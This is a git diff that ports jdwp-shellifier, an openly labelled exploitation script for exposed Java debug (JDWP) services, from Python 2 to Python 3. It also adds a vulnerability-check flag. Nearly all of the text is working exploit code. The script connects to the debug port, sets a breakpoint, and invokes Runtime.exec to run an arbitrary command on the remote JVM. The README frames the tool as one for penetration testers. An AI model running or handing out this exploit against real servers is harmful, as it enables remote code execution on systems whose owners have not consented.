diff --git a/README.md b/README.md index 802fae3..020bcba 100644 --- a/README.md +++ b/README.md @@ -7,24 +7,28 @@ This exploitation script is meant to be used by pentesters against active JDWP s Well, in a pretty standard way, the script only requires a Python 2 interpreter: % python ./jdwp-shellifier.py -h - usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD] + usage: jdwp-shellifier.py [-h] [-check] -t IP [-p PORT] [--break-on JAVA_METHOD] [--cmd COMMAND] Universal exploitation script for JDWP by @_hugsy_ optional arguments: -h, --help show this help message and exit + -check Check for vulnerability (default: False) -t IP, --target IP Remote target IP (default: None) -p PORT, --port PORT Remote target port (default: 8000) --break-on JAVA_METHOD - Specify full path to method to break on (default: - java.net.ServerSocket.accept) - --cmd COMMAND Specify full path to method to break on (default: - None) + Specify full path to method to break on, if does not work, try: + java.net.ServerSocket.accept (default: java.lang.String.indexOf) + --cmd COMMAND Specify command to execute remotely (default: None) + +To check a specific host/port without exploitation: + + $ python ./jdwp-shellifier.py -t my.target.ip -p 1234 -check To target a specific host/port: - $ python ./jdwp-shellifier.py -t my.target.ip -p 1234 + $ python ./jdwp-shellifier.py -t my.target.ip -p 1234 This command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept diff --git a/jdwp-shellifier.py b/jdwp-shellifier.py index c44fae5..bea6101 100755 --- a/jdwp-shellifier.py +++ b/jdwp-shellifier.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/python3 ################################################################################ # # Universal JDWP shellifier @@ -6,22 +6,23 @@ # @_hugsy_ # # And special cheers to @lanjelot -# +# https://github.com/IOActive/jdwp-shellifier import socket import time import sys import struct -import urllib +import urllib.request, urllib.parse, urllib.error import argparse - +import os +import traceback #show error (discripted) ################################################################################ # # JDWP protocol variables # -HANDSHAKE = "JDWP-Handshake" +HANDSHAKE = b"JDWP-Handshake" REQUEST_PACKET_TYPE = 0x00 REPLY_PACKET_TYPE = 0x80 @@ -80,13 +81,14 @@ def __init__(self, host, port=8000): self.methods = {} self.fields = {} self.id = 0x01 + self.check = False return - def create_packet(self, cmdsig, data=""): + def create_packet(self, cmdsig, data=b""): flags = 0x00 cmdset, cmd = cmdsig pktlen = len(data) + 11 - pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd)) + pkt = struct.pack(">IIccc", pktlen, self.id, bytes([flags]), bytes([cmdset]), bytes([cmd])) pkt+= data self.id += 2 return pkt @@ -95,11 +97,11 @@ def read_reply(self): header = self.socket.recv(11) pktlen, id, flags, errcode = struct.unpack(">IIcH", header) - if flags == chr(REPLY_PACKET_TYPE): + if flags == bytes([REPLY_PACKET_TYPE]): if errcode : raise Exception("Received errcode %d" % errcode) - buf = "" + buf = b"" while len(buf) + 11 < pktlen: data = self.socket.recv(1024) if len(data): @@ -122,21 +124,21 @@ def parse_entries(self, buf, formats, explicit=True): for i in range(nb_entries): data = {} for fmt, name in formats: - if fmt == "L" or fmt == 8: + if fmt == b"L" or fmt == 8: data[name] = int(struct.unpack(">Q",buf[index:index+8]) [0]) index += 8 - elif fmt == "I" or fmt == 4: + elif fmt == b"I" or fmt == 4: data[name] = int(struct.unpack(">I", buf[index:index+4])[0]) index += 4 - elif fmt == 'S': + elif fmt == b'S': l = struct.unpack(">I", buf[index:index+4])[0] data[name] = buf[index+4:index+4+l] index += 4+l - elif fmt == 'C': - data[name] = ord(struct.unpack(">c", buf[index])[0]) + elif fmt == b'C': + data[name] = ord(struct.unpack(">c", bytes([buf[index]]))[0]) index += 1 - elif fmt == 'Z': - t = ord(struct.unpack(">c", buf[index])[0]) + elif fmt == b'Z': + t = ord(struct.unpack(">c", bytes([buf[index]]))[0]) if t == 115: s = self.solve_string(buf[index+1:index+9]) data[name] = s @@ -147,7 +149,7 @@ def parse_entries(self, buf, formats, explicit=True): index=0 else: - print "Error" + print("Error") sys.exit(1) entries.append( data ) @@ -155,17 +157,17 @@ def parse_entries(self, buf, formats, explicit=True): return entries def format(self, fmt, value): - if fmt == "L" or fmt == 8: + if fmt == b"L" or fmt == 8: return struct.pack(">Q", value) - elif fmt == "I" or fmt == 4: + elif fmt == b"I" or fmt == 4: return struct.pack(">I", value) raise Exception("Unknown format") def unformat(self, fmt, value): - if fmt == "L" or fmt == 8: + if fmt == b"L" or fmt == 8: return struct.unpack(">Q", value[:8])[0] - elif fmt == "I" or fmt == 4: + elif fmt == b"I" or fmt == 4: return struct.unpack(">I", value[:4])[0] else: raise Exception("Unknown format") @@ -173,6 +175,10 @@ def unformat(self, fmt, value): def start(self): self.handshake(self.host, self.port) + if self.check and self.socket is not None: + print('[+] Target: {}:{} is vulnerable'.format(self.host, self.port)) + return + self.idsizes() self.getversion() self.allclasses() @@ -185,13 +191,11 @@ def handshake(self, host, port): except socket.error as msg: raise Exception("Failed to connect: %s" % msg) - s.send( HANDSHAKE ) - + s.send(HANDSHAKE ) if s.recv( len(HANDSHAKE) ) != HANDSHAKE: raise Exception("Failed to handshake") else: self.socket = s - return def leave(self): @@ -201,10 +205,10 @@ def leave(self): def getversion(self): self.socket.sendall( self.create_packet(VERSION_SIG) ) buf = self.read_reply() - formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"), - ('S', "vmVersion"), ('S', "vmName"), ] + formats = [ (b'S', "description"), (b'I', "jdwpMajor"), (b'I', "jdwpMinor"), + (b'S', "vmVersion"), (b'S', "vmName"), ] for entry in self.parse_entries(buf, formats, False): - for name,value in entry.iteritems(): + for name,value in entry.items(): setattr(self, name, value) return @@ -215,10 +219,10 @@ def version(self): def idsizes(self): self.socket.sendall( self.create_packet(IDSIZES_SIG) ) buf = self.read_reply() - formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"), - ("I", "referenceTypeIDSize"), ("I", "frameIDSize") ] + formats = [ (b"I", "fieldIDSize"), (b"I", "methodIDSize"), (b"I", "objectIDSize"), + (b"I", "referenceTypeIDSize"), (b"I", "frameIDSize") ] for entry in self.parse_entries(buf, formats, False): - for name,value in entry.iteritems(): + for name,value in entry.items(): setattr(self, name, value) return @@ -249,48 +253,48 @@ def allclasses(self): except: self.socket.sendall( self.create_packet(ALLCLASSES_SIG) ) buf = self.read_reply() - formats = [ ('C', "refTypeTag"), - (self.referenceTypeIDSize, "refTypeId"), - ('S', "signature"), - ('I', "status")] + formats = [ (b'C', b"refTypeTag"), + (self.referenceTypeIDSize, b"refTypeId"), + (b'S', b"signature"), + (b'I', b"status")] self.classes = self.parse_entries(buf, formats) return self.classes def get_class_by_name(self, name): for entry in self.classes: - if entry["signature"].lower() == name.lower() : + if entry[b"signature"].lower() == name.lower() : return entry return None def get_methods(self, refTypeId): - if not self.methods.has_key(refTypeId): + if refTypeId not in self.methods: refId = self.format(self.referenceTypeIDSize, refTypeId) self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) ) buf = self.read_reply() - formats = [ (self.methodIDSize, "methodId"), - ('S', "name"), - ('S', "signature"), - ('I', "modBits")] + formats = [ (self.methodIDSize, b"methodId"), + (b'S', b"name"), + (b'S', b"signature"), + (b'I', b"modBits")] self.methods[refTypeId] = self.parse_entries(buf, formats) return self.methods[refTypeId] def get_method_by_name(self, name): - for refId in self.methods.keys(): + for refId in list(self.methods.keys()): for entry in self.methods[refId]: - if entry["name"].lower() == name.lower() : + if entry[b"name"].lower() == name.lower() : return entry return None def getfields(self, refTypeId): - if not self.fields.has_key( refTypeId ): + if refTypeId not in self.fields: refId = self.format(self.referenceTypeIDSize, refTypeId) self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) ) buf = self.read_reply() - formats = [ (self.fieldIDSize, "fieldId"), - ('S', "name"), - ('S', "signature"), - ('I', "modbits")] + formats = [ (self.fieldIDSize, b"fieldId"), + (b'S', "name"), + (b'S', "signature"), + (b'I', "modbits")] self.fields[refTypeId] = self.parse_entries(buf, formats) return self.fields[refTypeId] @@ -300,7 +304,7 @@ def getvalue(self, refTypeId, fieldId): data+= self.format(self.fieldIDSize, fieldId) self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) ) buf = self.read_reply() - formats = [ ("Z", "value") ] + formats = [ (b"Z", "value") ] field = self.parse_entries(buf, formats)[0] return field @@ -308,9 +312,11 @@ def createstring(self, data): buf = self.buildstring(data) self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) ) buf = self.read_reply() - return self.parse_entries(buf, [(self.objectIDSize, "objId")], False) + return self.parse_entries(buf, [(self.objectIDSize, b"objId")], False) def buildstring(self, data): + if isinstance(data,str): + data = data.encode() return struct.pack(">I", len(data)) + data def readstring(self, data): @@ -360,7 +366,7 @@ def solve_string(self, objId): if len(buf): return self.readstring(buf) else: - return "" + return b"" def query_thread(self, threadId, kind): data = self.format(self.objectIDSize, threadId) @@ -378,13 +384,13 @@ def resume_thread(self, threadId): return self.query_thread(threadId, THREADRESUME_SIG) def send_event(self, eventCode, *args): - data = "" - data+= chr( eventCode ) - data+= chr( SUSPEND_ALL ) + data = b"" + data+= bytes([eventCode]) + data+= bytes([SUSPEND_ALL]) data+= struct.pack(">I", len(args)) for kind, option in args: - data+= chr( kind ) + data+= bytes([kind]) data+= option self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) ) @@ -392,7 +398,7 @@ def send_event(self, eventCode, *args): return struct.unpack(">I", buf)[0] def clear_event(self, eventCode, rId): - data = chr(eventCode) + data = bytes([eventCode]) data+= struct.pack(">I", rId) self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) ) self.read_reply() @@ -419,23 +425,23 @@ def parse_event_breakpoint(self, buf, eventId): def runtime_exec(jdwp, args): - print ("[+] Targeting '%s:%d'" % (args.target, args.port)) - print ("[+] Reading settings for '%s'" % jdwp.version) + print("[+] Targeting '%s:%d'" % (args.target, args.port)) + print("[+] Reading settings for '%s'" % jdwp.version) # 1. get Runtime class reference - runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;") + runtimeClass = jdwp.get_class_by_name(b"Ljava/lang/Runtime;") if runtimeClass is None: print ("[-] Cannot find class Runtime") return False - print ("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"]) + print("[+] Found Runtime class: id=%x" % runtimeClass[b"refTypeId"]) # 2. get getRuntime() meth reference - jdwp.get_methods(runtimeClass["refTypeId"]) - getRuntimeMeth = jdwp.get_method_by_name("getRuntime") + jdwp.get_methods(runtimeClass[b"refTypeId"]) + getRuntimeMeth = jdwp.get_method_by_name(b"getRuntime") if getRuntimeMeth is None: print ("[-] Cannot find method Runtime.getRuntime()") return False - print ("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"]) + print("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth[b"methodId"]) # 3. setup breakpoint on frequently called method c = jdwp.get_class_by_name( args.break_on_class ) @@ -445,24 +451,24 @@ def runtime_exec(jdwp, args): print("[-] Test with another one with option `--break-on`") return False - jdwp.get_methods( c["refTypeId"] ) + jdwp.get_methods( c[b"refTypeId"] ) m = jdwp.get_method_by_name( args.break_on_method ) if m is None: print("[-] Could not access method '%s'" % args.break_on) return False - loc = chr( TYPE_CLASS ) - loc+= jdwp.format( jdwp.referenceTypeIDSize, c["refTypeId"] ) - loc+= jdwp.format( jdwp.methodIDSize, m["methodId"] ) + loc = bytes([TYPE_CLASS]) + loc+= jdwp.format( jdwp.referenceTypeIDSize, c[b"refTypeId"] ) + loc+= jdwp.format( jdwp.methodIDSize, m[b"methodId"] ) loc+= struct.pack(">II", 0, 0) data = [ (MODKIND_LOCATIONONLY, loc), ] rId = jdwp.send_event( EVENT_BREAKPOINT, *data ) - print ("[+] Created break event id=%x" % rId) + print("[+] Created break event id=%x" % rId) # 4. resume vm and wait for event jdwp.resumevm() - print ("[+] Waiting for an event on '%s'" % args.break_on) + print("[+] Waiting for an event on '%s'" % args.break_on) while True: buf = jdwp.wait_for_event() ret = jdwp.parse_event_breakpoint(buf, rId) @@ -470,13 +476,13 @@ def runtime_exec(jdwp, args): break rId, tId, loc = ret - print ("[+] Received matching event from thread %#x" % tId) + print("[+] Received matching event from thread %#x" % tId) jdwp.clear_event(EVENT_BREAKPOINT, rId) # 5. Now we can execute any code if args.cmd: - runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"], getRuntimeMeth["methodId"], args.cmd) + runtime_exec_payload(jdwp, tId, runtimeClass[b"refTypeId"], getRuntimeMeth[b"methodId"], args.cmd) else: # by default, only prints out few system properties runtime_exec_info(jdwp, tId) @@ -493,64 +499,64 @@ def runtime_exec_info(jdwp, threadId): # This function calls java.lang.System.getProperties() and # displays OS properties (non-intrusive) # - properties = {"java.version": "Java Runtime Environment version", - "java.vendor": "Java Runtime Environment vendor", - "java.vendor.url": "Java vendor URL", - "java.home": "Java installation directory", - "java.vm.specification.version": "Java Virtual Machine specification version", - "java.vm.specification.vendor": "Java Virtual Machine specification vendor", - "java.vm.specification.name": "Java Virtual Machine specification name", - "java.vm.version": "Java Virtual Machine implementation version", - "java.vm.vendor": "Java Virtual Machine implementation vendor", - "java.vm.name": "Java Virtual Machine implementation name", - "java.specification.version": "Java Runtime Environment specification version", - "java.specification.vendor": "Java Runtime Environment specification vendor", - "java.specification.name": "Java Runtime Environment specification name", - "java.class.version": "Java class format version number", - "java.class.path": "Java class path", - "java.library.path": "List of paths to search when loading libraries", - "java.io.tmpdir": "Default temp file path", - "java.compiler": "Name of JIT compiler to use", - "java.ext.dirs": "Path of extension directory or directories", - "os.name": "Operating system name", - "os.arch": "Operating system architecture", - "os.version": "Operating system version", - "file.separator": "File separator", - "path.separator": "Path separator", - "user.name": "User's account name", - "user.home": "User's home directory", - "user.dir": "User's current working directory" + properties = {b"java.version": b"Java Runtime Environment version", + b"java.vendor": b"Java Runtime Environment vendor", + b"java.vendor.url": b"Java vendor URL", + b"java.home": b"Java installation directory", + b"java.vm.specification.version": b"Java Virtual Machine specification version", + b"java.vm.specification.vendor": b"Java Virtual Machine specification vendor", + b"java.vm.specification.name": b"Java Virtual Machine specification name", + b"java.vm.version": b"Java Virtual Machine implementation version", + b"java.vm.vendor": b"Java Virtual Machine implementation vendor", + b"java.vm.name": b"Java Virtual Machine implementation name", + b"java.specification.version": b"Java Runtime Environment specification version", + b"java.specification.vendor": b"Java Runtime Environment specification vendor", + b"java.specification.name": b"Java Runtime Environment specification name", + b"java.class.version": b"Java class format version number", + b"java.class.path": b"Java class path", + b"java.library.path": b"List of paths to search when loading libraries", + b"java.io.tmpdir": b"Default temp file path", + b"java.compiler": b"Name of JIT compiler to use", + b"java.ext.dirs": b"Path of extension directory or directories", + b"os.name": b"Operating system name", + b"os.arch": b"Operating system architecture", + b"os.version": b"Operating system version", + b"file.separator": b"File separator", + b"path.separator": b"Path separator", + b"user.name": b"User's account name", + b"user.home": b"User's home directory", + b"user.dir": b"User's current working directory" } - systemClass = jdwp.get_class_by_name("Ljava/lang/System;") + systemClass = jdwp.get_class_by_name(b"Ljava/lang/System;") if systemClass is None: print ("[-] Cannot find class java.lang.System") return False - jdwp.get_methods(systemClass["refTypeId"]) - getPropertyMeth = jdwp.get_method_by_name("getProperty") + jdwp.get_methods(systemClass[b"refTypeId"]) + getPropertyMeth = jdwp.get_method_by_name(b"getProperty") if getPropertyMeth is None: print ("[-] Cannot find method System.getProperty()") return False - for propStr, propDesc in properties.iteritems(): + for propStr, propDesc in properties.items(): propObjIds = jdwp.createstring(propStr) if len(propObjIds) == 0: print ("[-] Failed to allocate command") return False - propObjId = propObjIds[0]["objId"] + propObjId = propObjIds[0][b"objId"] - data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, propObjId), ] - buf = jdwp.invokestatic(systemClass["refTypeId"], + data = [ bytes([TAG_OBJECT]) + jdwp.format(jdwp.objectIDSize, propObjId), ] + buf = jdwp.invokestatic(systemClass[b"refTypeId"], threadId, - getPropertyMeth["methodId"], + getPropertyMeth[b"methodId"], *data) - if buf[0] != chr(TAG_STRING): - print ("[-] %s: Unexpected returned type: expecting String" % propStr) + if buf[0] != TAG_STRING: + print("[-] %s: Unexpected returned type: expecting String" % propStr) else: retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize]) res = cli.solve_string(jdwp.format(jdwp.objectIDSize, retId)) - print ("[+] Found %s '%s'" % (propDesc, res)) + print("[+] Found %s '%s'" % (propDesc, res)) return True @@ -560,74 +566,75 @@ def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, comma # This function will invoke command as a payload, which will be running # with JVM privilege on host (intrusive). # - print ("[+] Selected payload '%s'" % command) + print("[+] Selected payload '%s'" % command) # 1. allocating string containing our command to exec() cmdObjIds = jdwp.createstring( command ) if len(cmdObjIds) == 0: print ("[-] Failed to allocate command") return False - cmdObjId = cmdObjIds[0]["objId"] - print ("[+] Command string object created id:%x" % cmdObjId) + cmdObjId = cmdObjIds[0][b"objId"] + print("[+] Command string object created id:%x" % cmdObjId) # 2. use context to get Runtime object buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId) - if buf[0] != chr(TAG_OBJECT): + if buf[0] != TAG_OBJECT: + print('here1') print ("[-] Unexpected returned type: expecting Object") return False rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize]) if rt is None: - print "[-] Failed to invoke Runtime.getRuntime()" + print("[-] Failed to invoke Runtime.getRuntime()") return False - print ("[+] Runtime.getRuntime() returned context id:%#x" % rt) + print("[+] Runtime.getRuntime() returned context id:%#x" % rt) # 3. find exec() method - execMeth = jdwp.get_method_by_name("exec") + execMeth = jdwp.get_method_by_name(b"exec") if execMeth is None: print ("[-] Cannot find method Runtime.exec()") return False - print ("[+] found Runtime.exec(): id=%x" % execMeth["methodId"]) + print("[+] found Runtime.exec(): id=%x" % execMeth[b"methodId"]) # 4. call exec() in this context with the alloc-ed string - data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, cmdObjId) ] - buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data) - if buf[0] != chr(TAG_OBJECT): + data = [ bytes([TAG_OBJECT]) + jdwp.format(jdwp.objectIDSize, cmdObjId) ] + buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth[b"methodId"], *data) + if buf[0] != TAG_OBJECT: print ("[-] Unexpected returned type: expecting Object") return False retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize]) - print ("[+] Runtime.exec() successful, retId=%x" % retId) + print("[+] Runtime.exec() successful, retId=%x" % retId) return True def str2fqclass(s): - i = s.rfind('.') + i = s.rfind(b'.') if i == -1: print("Cannot parse path") sys.exit(1) method = s[i:][1:] - classname = 'L' + s[:i].replace('.', '/') + ';' + classname = b'L' + s[:i].replace(b'.', b'/') + b';' return classname, method if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) + parser.add_argument("-check", action="store_true", default=False, help="Check for vulnerability") parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True) parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port") - parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD", - default="java.net.ServerSocket.accept", help="Specify full path to method to break on") + default="java.lang.String.indexOf", help="Specify full path to method to break on, if does not work, try: java.net.ServerSocket.accept") parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND", help="Specify command to execute remotely") args = parser.parse_args() - - classname, meth = str2fqclass(args.break_on) + classname, meth = str2fqclass(args.break_on.encode()) setattr(args, "break_on_class", classname) setattr(args, "break_on_method", meth) @@ -635,8 +642,10 @@ def str2fqclass(s): try: cli = JDWPClient(args.target, args.port) + cli.check = args.check cli.start() - + if args.check is True: + exit() if runtime_exec(cli, args) == False: print ("[-] Exploit failed") retcode = 1 @@ -645,7 +654,7 @@ def str2fqclass(s): print ("[+] Exiting on user's request") except Exception as e: - print ("[-] Exception: %s" % e) + print(traceback.format_exc()) retcode = 1 cli = None @@ -653,4 +662,4 @@ def str2fqclass(s): if cli: cli.leave() - sys.exit(retcode) + sys.exit(retcode) \ No newline at end of file